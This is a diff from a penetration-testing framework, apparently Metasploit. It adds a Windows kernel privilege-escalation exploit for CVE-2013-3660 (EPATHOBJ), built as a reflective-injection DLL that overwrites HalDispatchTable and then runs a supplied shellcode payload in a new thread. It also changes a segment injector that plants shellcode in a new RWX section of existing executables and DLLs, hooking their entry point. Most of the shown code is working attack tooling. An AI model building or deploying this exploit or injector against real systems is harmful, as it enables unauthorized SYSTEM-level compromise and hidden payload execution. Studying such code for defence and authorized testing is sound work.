@ -0,0 +1,22 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 2013
VisualStudioVersion = 12.0.21005.1
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ppr_flatten_rec", "ppr_flatten_rec\ppr_flatten_rec.vcxproj", "{942BF20A-E438-48B0-A614-A6E0CC2E94BD}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.ActiveCfg = Debug|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Debug|Win32.Build.0 = Debug|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.ActiveCfg = Release|Win32
{942BF20A-E438-48B0-A614-A6E0CC2E94BD}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

31
external/source/exploits/cve-2013-3660/dll/src/ComplexPath.h → external/source/exploits/cve-2013-3660/ppr_flatten_rec/ComplexPath.h vendored
View File

@ -418,19 +418,10 @@
# define WIN32_NO_STATUS # define WIN32_NO_STATUS
#endif #endif
#include <stdio.h> #include <stdio.h>
#include <stdarg.h>
#include <stddef.h>
#include <windows.h>
#include <assert.h>
#ifdef WIN32_NO_STATUS #ifdef WIN32_NO_STATUS
# undef WIN32_NO_STATUS # undef WIN32_NO_STATUS
#endif #endif
#include <ntstatus.h>
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
#pragma comment(lib, "shell32")
#pragma comment(linker, "/SECTION:.text,ERW") #pragma comment(linker, "/SECTION:.text,ERW")
#ifndef PAGE_SIZE #ifndef PAGE_SIZE
@ -448,11 +439,6 @@ static ULONG ComplexPathNumRegion = 0;
static HANDLE Mutex; static HANDLE Mutex;
static DWORD ComplexPathFinished = 0; static DWORD ComplexPathFinished = 0;
// Log levels.
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
BOOL LogMessage(LEVEL Level, PCHAR Format, ...);
// Copied from winddi.h from the DDK // Copied from winddi.h from the DDK
#define PD_BEGINSUBPATH 0x00000001 #define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002 #define PD_ENDSUBPATH 0x00000002
@ -509,16 +495,15 @@ ULONG HalQuerySystemInformation;
PULONG TargetPid; PULONG TargetPid;
PVOID *PsInitialSystemProcess; PVOID *PsInitialSystemProcess;
VOID elevator_complex_path();
//#define DEBUGTRACE 1 //#define DEBUGTRACE 1
#ifdef DEBUGTRACE // Log levels.
#define dprintf(...) real_dprintf(__VA_ARGS__) typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
#else
#define dprintf(...) do{}while(0);
#endif
#ifdef DEBUGTRACE
VOID LogMessage(LEVEL Level, PCHAR Format, ...);
#define dprintf(...) real_dprintf(__VA_ARGS__)
static void real_dprintf(char *format, ...) { static void real_dprintf(char *format, ...) {
va_list args; va_list args;
char buffer[1024]; char buffer[1024];
@ -527,3 +512,7 @@ static void real_dprintf(char *format, ...) {
strcat_s(buffer, sizeof(buffer), "\r\n"); strcat_s(buffer, sizeof(buffer), "\r\n");
OutputDebugStringA(buffer); OutputDebugStringA(buffer);
} }
#else
#define dprintf(...)
#define LogMessage(...)
#endif

98
external/source/exploits/cve-2013-3660/dll/src/ReflectiveDll.c → external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.c vendored
View File

@ -1,15 +1,15 @@
//===============================================================================================// //===============================================================================================//
// This is a stub for the actuall functionality of the DLL. // This is a stub for the actual functionality of the DLL.
//===============================================================================================// //===============================================================================================//
// Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// DllMain and use the LoadRemoteLibraryR() API to inject this DLL. #include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
//===============================================================================================//
#include "ReflectiveLoader.h"
#include "ComplexPath.h" #include "ComplexPath.h"
// Purloined from ntstatus.h
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth
// //
// -------------------------------------------------- // --------------------------------------------------
// Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit // Windows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit
@ -550,7 +550,20 @@ VOID __declspec(naked) HalDispatchRedirect(VOID)
} }
} }
VOID elevator_complex_path() /*!
* @brief Helper thread function which runs the given payload directly.
* @param lpPayload The payload shellcode to execute.
* @returns \c ERROR_SUCCESS
*/
DWORD WINAPI execute_payload(LPVOID lpPayload)
{
LogMessage(L_INFO, "[PPRFLATTENREC] Payload thread started.");
VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode();
return ERROR_SUCCESS;
}
VOID elevator_complex_path(LPVOID lpPayload)
{ {
HANDLE Thread; HANDLE Thread;
HDC Device; HDC Device;
@ -566,6 +579,12 @@ VOID elevator_complex_path()
"\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n" "\rWindows NT/2K/XP/2K3/VISTA/2K8/7/8 EPATHOBJ local ring0 exploit\n"
"\r------------------- taviso@cmpxchg8b.com, programmeboy@gmail.com ---\n" "\r------------------- taviso@cmpxchg8b.com, programmeboy@gmail.com ---\n"
"\n"); "\n");
if (lpPayload == NULL) {
LogMessage(L_ERROR, "[PRFLATTENREC] payload argument not specified");
return;
}
NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile"); NtQueryIntervalProfile = GetProcAddress(GetModuleHandle("ntdll"), "NtQueryIntervalProfile");
NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation"); NtQuerySystemInformation = GetProcAddress(GetModuleHandle("ntdll"), "NtQuerySystemInformation");
Mutex = CreateMutex(NULL, FALSE, NULL); Mutex = CreateMutex(NULL, FALSE, NULL);
@ -590,10 +609,10 @@ VOID elevator_complex_path()
// Lookup some system routines we require. // Lookup some system routines we require.
KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName); KernelHandle = LoadLibrary(ModuleInfo.Modules[0].FullPathName + ModuleInfo.Modules[0].OffsetToFileName);
HalDispatchTable = (ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; HalDispatchTable = (PULONG)((ULONG) GetProcAddress(KernelHandle, "HalDispatchTable") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsInitialSystemProcess = (ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; PsInitialSystemProcess = (PVOID*)((ULONG) GetProcAddress(KernelHandle, "PsInitialSystemProcess") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsReferencePrimaryToken = (ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; PsReferencePrimaryToken = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsReferencePrimaryToken") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
PsLookupProcessByProcessId = (ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase; PsLookupProcessByProcessId = (FARPROC)((ULONG) GetProcAddress(KernelHandle, "PsLookupProcessByProcessId") - (ULONG) KernelHandle + (ULONG) ModuleInfo.Modules[0].ImageBase);
// Search for a ret instruction to install in the damaged HalDispatchTable. // Search for a ret instruction to install in the damaged HalDispatchTable.
HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize) HalQuerySystemInformation = (ULONG) memchr(KernelHandle, 0xC3, ModuleInfo.Modules[0].ImageSize)
@ -629,7 +648,7 @@ VOID elevator_complex_path()
// I need to map at least two pages to guarantee the whole structure is // I need to map at least two pages to guarantee the whole structure is
// available. // available.
while (!VirtualAlloc(*DispatchRedirect & ~(PAGE_SIZE - 1), while (!VirtualAlloc((LPVOID)(*DispatchRedirect & ~(PAGE_SIZE - 1)),
PAGE_SIZE * 2, PAGE_SIZE * 2,
MEM_COMMIT | MEM_RESERVE, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)) { PAGE_EXECUTE_READWRITE)) {
@ -740,7 +759,7 @@ VOID elevator_complex_path()
if (ComplexPathFinished) { if (ComplexPathFinished) {
LogMessage(L_INFO, "Success...", ComplexPathFinished); LogMessage(L_INFO, "Success...", ComplexPathFinished);
//ExitProcess(0); CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
return; return;
} }
@ -756,7 +775,8 @@ VOID elevator_complex_path()
} }
// A quick logging routine for debug messages. // A quick logging routine for debug messages.
BOOL LogMessage(LEVEL Level, PCHAR Format, ...) #ifdef DEBUGTRACE
VOID LogMessage(LEVEL Level, PCHAR Format, ...)
{ {
CHAR Buffer[1024] = {0}; CHAR Buffer[1024] = {0};
va_list Args; va_list Args;
@ -774,28 +794,34 @@ BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
//fflush(stdout); //fflush(stdout);
//flush(stderr); //flush(stderr);
return TRUE;
} }
extern HINSTANCE hAppInstance; #else
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) #define LogMessage(...)
#endif
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{ {
BOOL bReturnValue = TRUE; BOOL bReturnValue = TRUE;
switch( dwReason ) dprintf("[PPRFLATTENREC] DllMain invoked, reason: %u", dwReason);
{ switch (dwReason)
case DLL_QUERY_HMODULE: {
if( lpReserved != NULL ) case DLL_QUERY_HMODULE:
*(HMODULE *)lpReserved = hAppInstance; hAppInstance = hinstDLL;
hAppInstance = hinstDLL; dprintf("[PPRFLATTENREC] Module queried %x", hinstDLL);
elevator_complex_path(); if (lpReserved != NULL)
break; {
case DLL_PROCESS_ATTACH: *(HMODULE *)lpReserved = hAppInstance;
hAppInstance = hinstDLL; }
break; break;
case DLL_PROCESS_DETACH: case DLL_PROCESS_ATTACH:
case DLL_THREAD_ATTACH: hAppInstance = hinstDLL;
case DLL_THREAD_DETACH: dprintf("[PPRFLATTENREC] Launching exploit with %p", lpReserved);
break; elevator_complex_path(lpReserved);
} break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue; return bReturnValue;
} }

141
external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj vendored Executable file
View File

@ -0,0 +1,141 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{942BF20A-E438-48B0-A614-A6E0CC2E94BD}</ProjectGuid>
<RootNamespace>ppr_flatten_rec</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;PPR_FLATTEN_REC_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\ppr_flatten_rec.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\ppr_flatten_rec.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-3660\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2013-3660\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-3660\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="ppr_flatten_rec.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="ComplexPath.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

9
external/source/exploits/cve-2013-3660/ppr_flatten_rec/ppr_flatten_rec.vcxproj.filters vendored Executable file
View File

@ -0,0 +1,9 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="ppr_flatten_rec.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="ComplexPath.h" />
</ItemGroup>
</Project>

20
external/source/exploits/cve-2013-3660/rdi.sln vendored
View File

@ -1,20 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual C++ Express 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Release|Win32 = Release|Win32
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal

7
external/source/exploits/make.bat vendored
View File

@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
msbuild.exe make.msbuild /target:%PLAT% msbuild.exe make.msbuild /target:%PLAT%
POPD POPD
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
PUSHD CVE-2013-3660
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6% SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
echo Finished %ldt% echo Finished %ldt%

45
lib/msf/base/simple/buffer.rb
View File

@ -16,11 +16,15 @@ module Buffer
# #
# Serializes a buffer to a provided format. The formats supported are raw, # Serializes a buffer to a provided format. The formats supported are raw,
# ruby, perl, bash, c, js_be, js_le, java and psh # num, dword, ruby, python, perl, bash, c, js_be, js_le, java and psh
# #
def self.transform(buf, fmt = "ruby") def self.transform(buf, fmt = "ruby")
case fmt case fmt
when 'raw' when 'raw'
when 'num'
buf = Rex::Text.to_num(buf)
when 'dword', 'dw'
buf = Rex::Text.to_dword(buf)
when 'python', 'py' when 'python', 'py'
buf = Rex::Text.to_python(buf) buf = Rex::Text.to_python(buf)
when 'ruby', 'rb' when 'ruby', 'rb'
@ -54,11 +58,13 @@ module Buffer
# #
# Creates a comment using the supplied format. The formats supported are # Creates a comment using the supplied format. The formats supported are
# raw, ruby, perl, bash, js_be, js_le, c, and java. # raw, ruby, python, perl, bash, js_be, js_le, c, and java.
# #
def self.comment(buf, fmt = "ruby") def self.comment(buf, fmt = "ruby")
case fmt case fmt
when 'raw' when 'raw'
when 'num', 'dword', 'dw'
buf = Rex::Text.to_js_comment(buf)
when 'ruby', 'rb', 'python', 'py' when 'ruby', 'rb', 'python', 'py'
buf = Rex::Text.to_ruby_comment(buf) buf = Rex::Text.to_ruby_comment(buf)
when 'perl', 'pl' when 'perl', 'pl'
@ -84,19 +90,28 @@ module Buffer
# Returns the list of supported formats # Returns the list of supported formats
# #
def self.transform_formats def self.transform_formats
['raw', [
'ruby','rb', 'bash',
'perl','pl', 'c',
'bash','sh', 'csharp',
'c', 'dw',
'csharp', 'dword',
'js_be', 'java',
'js_le', 'js_be',
'java', 'js_le',
'python','py', 'num',
'powershell','ps1', 'perl',
'vbscript', 'pl',
'vbapplication' 'powershell',
'ps1',
'py',
'python',
'raw',
'rb',
'ruby',
'sh',
'vbapplication',
'vbscript'
] ]
end end

34
lib/msf/core/exe/segment_injector.rb
View File

@ -31,14 +31,12 @@ module Exe
def create_thread_stub def create_thread_stub
<<-EOS <<-EOS
hook_entrypoint:
pushad pushad
push hook_libname push hook_libname
call [iat_LoadLibraryA] call [iat_LoadLibraryA]
push hook_funcname push hook_funcname
push eax push eax
call [iat_GetProcAddress] call [iat_GetProcAddress]
mov eax, [iat_CreateThread]
lea edx, [thread_hook] lea edx, [thread_hook]
push 0 push 0
push 0 push 0
@ -68,8 +66,9 @@ module Exe
return asm return asm
end end
def payload_stub def payload_stub(prefix)
asm = create_thread_stub asm = "hook_entrypoint:\n#{prefix}\n"
asm << create_thread_stub
asm << payload_as_asm asm << payload_as_asm
shellcode = Metasm::Shellcode.assemble(processor, asm) shellcode = Metasm::Shellcode.assemble(processor, asm)
shellcode.encoded shellcode.encoded
@ -85,14 +84,37 @@ module Exe
pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup pe.mz.encoded.export = pe_orig.encoded[0, 512].export.dup
pe.header.time = pe_orig.header.time pe.header.time = pe_orig.header.time
# Don't rebase if we can help it since Metasm doesn't do relocations well
pe.optheader.dll_characts.delete("DYNAMIC_BASE")
prefix = ''
if pe.header.characteristics.include? "DLL"
# if there is no entry point, just return after we bail or spawn shellcode
if pe.optheader.entrypoint == 0
prefix = "cmp [esp + 8], 1
jz spawncode
entrypoint:
xor eax, eax
inc eax
ret 0x0c
spawncode:"
else
# there is an entry point, we'll need to go to it after we bail or spawn shellcode
# if fdwReason != DLL_PROCESS_ATTACH, skip the shellcode, jump back to original DllMain
prefix = "cmp [esp + 8], 1
jnz entrypoint"
end
end
# Generate a new code section set to RWX with our payload in it # Generate a new code section set to RWX with our payload in it
s = Metasm::PE::Section.new s = Metasm::PE::Section.new
s.name = '.text' s.name = '.text'
s.encoded = payload_stub s.encoded = payload_stub prefix
s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE] s.characteristics = %w[MEM_READ MEM_WRITE MEM_EXECUTE]
# Tell our section where the original entrypoint was # Tell our section where the original entrypoint was
s.encoded.fixup!('entrypoint' => pe.optheader.image_base + pe.optheader.entrypoint) if pe.optheader.entrypoint != 0
s.encoded.fixup!('entrypoint' => pe.optheader.image_base + pe.optheader.entrypoint)
end
pe.sections << s pe.sections << s
pe.invalidate_header pe.invalidate_header

3
lib/msf/core/module/author.rb
View File

@ -45,7 +45,8 @@ class Msf::Module::Author
'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com', 'stinko' => 'vinnie' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'todb' => 'todb' + 0x40.chr + 'metasploit.com', 'todb' => 'todb' + 0x40.chr + 'metasploit.com',
'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com' 'vlad902' => 'vlad902' + 0x40.chr + 'gmail.com',
'wvu' => 'wvu' + 0x40.chr + 'metasploit.com'
} }
# #

2
lib/msf/core/module/reference.rb
View File

@ -102,8 +102,6 @@ class Msf::Module::SiteReference < Msf::Module::Reference
self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
elsif (in_ctx_id == 'MSB') elsif (in_ctx_id == 'MSB')
self.site = 'http://www.microsoft.com/technet/security/bulletin/' + in_ctx_val.to_s + '.mspx' self.site = 'http://www.microsoft.com/technet/security/bulletin/' + in_ctx_val.to_s + '.mspx'
elsif (in_ctx_id == 'MIL')
self.site = 'http://milw0rm.com/metasploit/' + in_ctx_val.to_s
elsif (in_ctx_id == 'EDB') elsif (in_ctx_id == 'EDB')
self.site = 'http://www.exploit-db.com/exploits/' + in_ctx_val.to_s self.site = 'http://www.exploit-db.com/exploits/' + in_ctx_val.to_s
elsif (in_ctx_id == 'WVE') elsif (in_ctx_id == 'WVE')

30
lib/msf/core/payload/windows/reflectivedllinject.rb
View File

@ -1,7 +1,7 @@
# -*- coding: binary -*- # -*- coding: binary -*-
require 'msf/core' require 'msf/core'
require 'rex/peparsey' require 'msf/core/reflective_dll_loader'
module Msf module Msf
@ -15,6 +15,7 @@ module Msf
module Payload::Windows::ReflectiveDllInject module Payload::Windows::ReflectiveDllInject
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows include Msf::Payload::Windows
def initialize(info = {}) def initialize(info = {})
@ -22,7 +23,10 @@ module Payload::Windows::ReflectiveDllInject
'Name' => 'Reflective DLL Injection', 'Name' => 'Reflective DLL Injection',
'Description' => 'Inject a DLL via a reflective loader', 'Description' => 'Inject a DLL via a reflective loader',
'Author' => [ 'sf' ], 'Author' => [ 'sf' ],
'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ], 'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'PayloadCompat' => 'PayloadCompat' =>
@ -47,26 +51,8 @@ module Payload::Windows::ReflectiveDllInject
end end
def stage_payload(target_id=nil) def stage_payload(target_id=nil)
dll = "" # Exceptions will be thrown by the mixin if there are issues.
offset = 0 dll, offset = load_rdi_dll(library_path)
begin
File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) }
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
raise "Can't find an exported ReflectiveLoader function!" if offset == 0
rescue
print_error( "Failed to read and parse Dll file: #{$!}" )
return
end
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration

30
lib/msf/core/payload/windows/x64/reflectivedllinject.rb
View File

@ -1,7 +1,7 @@
# -*- coding: binary -*- # -*- coding: binary -*-
require 'msf/core' require 'msf/core'
require 'rex/peparsey' require 'msf/core/reflective_dll_loader'
module Msf module Msf
@ -15,6 +15,7 @@ module Msf
module Payload::Windows::ReflectiveDllInject_x64 module Payload::Windows::ReflectiveDllInject_x64
include Msf::ReflectiveDLLLoader
include Msf::Payload::Windows include Msf::Payload::Windows
def initialize(info = {}) def initialize(info = {})
@ -22,7 +23,10 @@ module Payload::Windows::ReflectiveDllInject_x64
'Name' => 'Reflective DLL Injection', 'Name' => 'Reflective DLL Injection',
